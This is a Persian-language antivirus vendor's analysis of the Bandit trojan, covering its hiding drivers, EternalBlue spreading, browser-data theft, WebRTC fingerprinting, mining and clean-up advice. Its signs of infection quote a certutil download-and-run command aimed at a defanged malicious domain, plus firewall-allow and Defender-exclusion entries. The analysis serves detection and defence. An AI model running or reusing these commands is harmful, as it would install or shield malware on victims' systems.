شرح کلی
نوع: تروجان (Trojan)
درجه تخریب: بالا
میزان شیوع: بالا
اسامی بدافزار
• Padvish) Trojan.Win32.Bandit.ApLib)
• Kaspersky) HEUR:Trojan.Win32.Chapak.pef)
• Avira) TR/AD.GoCloudnet.irwn)
تروجان (Trojan) چیست؟
تروجانها نوعی از بدافزار محسوب میشوند که خود را در قالب یک نرمافزار سالم و قانونی نشان میدهند و بسیار شبیه نرمافزارهای مفید و کاربردی رفتار میکنند. اما هنگامی که اجرا میشوند، خرابیهای زیادی را برای سیستم ایجاد میکنند. نرمافزارهای دانلود شده از اینترنت، جاسازی شدن در متن HTML، ضمیمه شدن به یک ایمیل و … از جمله راههای ورود تروجانها به سیستم هستند. تروجانها برخلاف ویروسها و کرمهای کامپیوتری قادر به تکثیر خود نیستند.
تروجان Bandit چیست؟
Bandit، یک تروجان است که با استفاده از تکنیکهای سطح پایین سیستم عامل ویندوز (کرنل)، فایلها و پردازههای خود را از دید کاربر مخفی میکند. این بدافزار برای انتشار خود از آسیبپذیری EternalBlue استفاده میکند. سپس، در ارتباط با سرور فرماندهی و کنترل خود (command and control)، ماژولهای مختلفی را دانلود و روی سیستم قربانی اجرا میکند.
توضیحات فنی
علائم آلودگی
• وجود کلید رجیستری TestApp که حاوی دامینهای مخرب در مقادیر زیرکلیدهای آن باشد.
• وجود دو تسک زمانبندی شده مشابه زیر که یکی از آنها فایل بهروزشده بدافزار را اجرا میکند و دیگری بدافزار موجود روی سیستم را اجرا میکند.
name : ScheduledUpdate
command : "cmd.exe /C certutil.exe -urlcache –split –f hxxps://bestblues[.]tech/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340"
scheduled : ONLOGON
name : csrss
command : "C:\Windows\rss\csrss.exe"
scheduled : ONLOGON
• وجود زیرکلیدی در کلید رجیستری Run که فایل “C:\Windows\rss\csrss.exe”
را اجرا میکند.
• وجود قوانین Firewall مشکوک نظیر:
Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”C:\Windows\rss\csrss.exe” enable=yes”
Cmd.exe /c “netsh advfirewall firewall add rule name=”csrss” dir=”in” action=allow program=”%AppData%Roaming\EpicNet Inc\CloudNet\cloudnet.exe” enable=yes”
• وجود موارد زیر در لیست استثنائات Windows Defender:
• Files/Directories :
C:\Windows
C:\Windows\rss
AppData%Roaming\EpicNet Inc\CloudNet
AppData%Local\Temp\csrss
AppData%\Roaming\WisprPine
C:\Windows\Windefender
AppData%Local\Temp\Wup
C:\Windows\System32\drivers
• Processes: csrss.exe , cloudnet.exe , windefender.exe
شرح عملکرد
اجرای تکنیک شناسایی سند باکس و ماشین مجازی
بدافزار با اجرای تکنیکهایی تلاش میکند تشخیص دهد که محیط اجرا، محیط مجازی یا سندباکس میباشد یا خیر. درصورت تشخیص، اجرای بدافزار را متوقف میکند.
زیر کلیدهای مخرب کلید رجیستری TestApp
همانطور که ذکر شد، بدافزار کلیدی با نام TestApp در مسیر HKCU\software\microsoft\TestApp
میسازد. در این حالت، کلید ذکر شده دارای تعداد زیادی زیرکلید مانند موارد زیر است (مقادیر این زیرکلیدها، به ویژه آدرس سرورها، ممکن است متفاوت باشد. همچنین، در گونه جدید، بدافزار از رشتههای تصادفی مانند “dd47a129” نیز به جای نام “TestApp” استفاده میکند) :
Key : HKCU\software\microsoft\TestApp
Subkeys :
Uuid = ""
command = ""
FirstInstallDate = "56268135e"
ServiceVersion = ""
SC = ""
PGDSE = ""
VC = ""
ServerVersion = "94"
CDN = "hxxps://bestblues[.]tech"
PP = ""
name = "SmallSea"
servers = "hxxps;//whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com"
firewall = ""
defender = ""
ایجاد پردازه csrss
بدافزار پس از اجرای تکنیکهایی برای ارتقا سطح دسترسی، دایرکتوری C:\Windows\rss
را ایجاد و آن را به یک دایرکتوری پنهان تبدیل میکند. سپس، فایل خود را با نام csrss.exe در این مسیر کپی میکند.
انتشار در شبکه محلی
این بدافزار برای انتشار خود از ابزارهای مرتبط با آسیب پذیریهای EternalBlue و DoublePulsar استفاده میکند. سیستمهای دارای نسخه آسیبپذیر پروتکل SMB را درسطح شبکه شناسایی میکند و با سوءاستفاده از این آسیب پذیری، بدافزار خود را روی آنها اجرا میکند.
بارگذاری درایورها
بدافزار سه درایور ایجاد و راه اندازی میکند:
1. درایور Winmon.sys: این درایور برای مخفی کردن پردازههای بدافزار استفاده میشود.
2. درایور WinmonFs.sys: این درایور دایرکتوریها/فایلهای بدافزار را از دید آنتیویروسها و ابزارهای مانیتورینگ پنهان میکند.
3. درایور WinmonProcessMonitor: این درایور یک لیست طولانی از اسامی پردازههای مرتبط با محصولات مانیتورینگ سیستم، آنتیویروسها و … را دارد و در زمان ایجاد هر پردازه روی سیستم، بررسی میکند که نام پردازه جدید در این لیست نباشد. در غیر این صورت، به اجرای آن خاتمه میدهد.
دانلود و اجرای ماژولهای بدافزار
1. ماژول Browser Stealer: این ماژول، کوکیها، تاریخچه و پایگاه داده محلی (local storage) مرورگرهایی نظیر coccoc ،chrome ،opera ،Firefox و Yandex را استخراج و در قالب یک فایل zip به سرور خود ارسال میکند.
2. ماژول Router Exploit: این ماژول، با هدف سوءاستفاده از آسیبپذیری روترهای موجود در سطح شبکه اجرا میشود.
3. ماژول Collectchromefingerprint: این ماژول، بررسی میکند که آیا مرورگر گوگل کروم روی سیستم نصب میباشد یا خیر. در این صورت، لینک زیر را در این مرورگر باز میکند.
hxxps://swebgames[.]site/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&browser=chrome
این لینک، یک صفحه html به ظاهر سفید است که در پس زمینه، کتابخانه جاوا اسکریپت DetectRTC به لینک https://github.com/muaz-khan/DetectRTC
را اجرا میکند و امکانات WebRTC شامل اینکه آیا سیستم قربانی Microphone ،Speaker و Webcam دارد، تعداد ابزارهای صوتی و ویدیویی سیستم، امکان گرفتن snapshot و … را بررسی و نتیجه را به سرور بدافزار به آدرس زیر ارسال میکند.
hxxps://swebgames[.]site/fp.php
4. ماژول bot: این ماژول، سیستم قربانی را در سرورهای بدافزار رجیستر میکند و سپس ارتباطات زیادی را با آنها برقرار میکند. از جمله این ارتباطات، دریافت فهرستی از استخرهای فعال از شبکه بیت کوین و ارتباط با آنها در جهت انجام عملیات استخراج ارز دیجیتالی روی سیستم قربانی است.
روش مقابله و پاکسازی سیستم
آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف میکند. جهت پیشگیری از آلودگیهای احتمالی توسط بدافزارهایی که از آسیبپذیری EternalBlue استفاده میکنند، پیشنهاد میشود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. بخش جلوگیری از نفوذ (IPS) آنتیویروس پادویش بدافزارهایی که از این گونه آسیبپذیری استفاده میکنند را شناسایی کرده و از ورود آنها به سیستم قربانی جلوگیری می کند.